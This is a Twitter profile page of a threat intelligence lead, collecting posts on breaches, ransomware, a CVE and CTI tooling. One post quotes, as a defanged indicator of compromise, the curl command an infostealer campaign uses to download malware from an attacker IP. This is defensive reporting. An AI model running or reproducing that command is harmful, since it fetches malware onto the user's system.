David Kasabji (@roo7cause)'s Twitter Profile
David Kasabji

@roo7cause

Head of Threat Intelligence #Conscia

ID: 410029576

Link: https://conscia.com/cybersecurity/threatinsights/

Joined: 11-11-2011 14:59:04

934 Tweets

219 Followers

422 Following

David Kasabji (@roo7cause):

Why did VirusTotal bump their prices by so much after being integrated into Google Threat Intelligence? I tried to find justifications, but there is no real value-add for a 50% price increase for us. Crazy. We were mostly using the API enrichments.

David Kasabji (@roo7cause):

We recently uncovered how a simple folder permission misconfiguration in the Checkmk Windows agent could be abused for DLL hijacking, leading to full SYSTEM privileges. This case (CVE-2024-28827) shows how small oversights can open the door to major privilege escalation.

The Hacker News (@thehackersnews):

⚠️ Salesloft pulled the plug on Drift after a massive supply-chain hack. Hackers stole its OAuth tokens—then used them to breach Salesforce at Cloudflare, Google Workspace, Palo Alto, Zscaler & 700+ orgs. Full story → thehackernews.com/2025/09/salesl…

Squiblydoo (@squiblydooblog):

David Kasabji Maybe interesting to you, I collaborated with Expel and wrote a long piece about the certificates: expel.com/blog/the-histo… GDATA has related articles too. Aura also has examples of using my db of revoked certs for threat hunting: github.com/SecurityAura/D…

Cyber Security News (@the_cyber_news):

🚨 Weaponized Microsoft Teams Installer to Compromise Systems With Oyster Malware | Read more: cybersecuritynews.com/weaponized-mic…

A sophisticated malvertising campaign is using fake Microsoft Teams installers to compromise corporate systems, leveraging poisoned search engine results and

David Kasabji (@roo7cause):

LockBit has relaunched with version 5.0, announced on Ramp Forum on September 3, 2025. This update features a redesigned affiliate panel and enhanced ransomware-as-a-service (RaaS) capabilities, aiming to recover from 2024 law enforcement actions that seized servers and leaked

David Kasabji (@roo7cause):

Data leak detection will have to expand to a new surface, which is LLMs. However, did anyone notice any CTI platform that promotes Credential / Data Leak detection, to offer also LLM-related data leaks? I think this one is a bit tougher to crack, but important today. Maybe some

HackManac (@h4ckmanac):

🚨🚨🚨BREAKING - New data leak site by Scattered LAPSUS$ Hunters exposes Salesforce customers. Dozens of global companies involved in a large-scale extortion campaign.

Scattered LAPSUS$ Hunters claims to have breached Salesforce, exfiltrating ~1B records.
They accuse Salesforce

David Kasabji (@roo7cause):

Just detected another Odyssey infostealer campaign. This time it uses the following URL to download the malware: curl -s http[:]//185.93.89[.]62/d/<victimID> The infection chain seems to start with the ClickFix technique, as we haven't observed (yet) in the logs anything else suspicious

David Kasabji (@roo7cause):

Most of the community is focused on the PR wording used by major vendors in breach disclosures. However, under the veil, we have to understand that a sophisticated threat actor had prolonged access to the environment (spanning months!) and yet, only "partial" leakage occurred.

David Kasabji (@roo7cause):

I am working on a new feature to automatically add Sightings to MISP attributes upon IOC detection in SOAR incidents. If the indicator is absent in MISP and assessed as malicious, it's added seamlessly to enhance threat intelligence sharing. This streamlines workflows and reduces

David Kasabji (@roo7cause):

Recent reports on the £80M Louvre heist indicate the surveillance system's password was "Louvre" -> a default setting unchanged since 2014. This just shows how unaddressed weak credentials in legacy systems continue to enable breaches, even in high-profile environments. In CTI,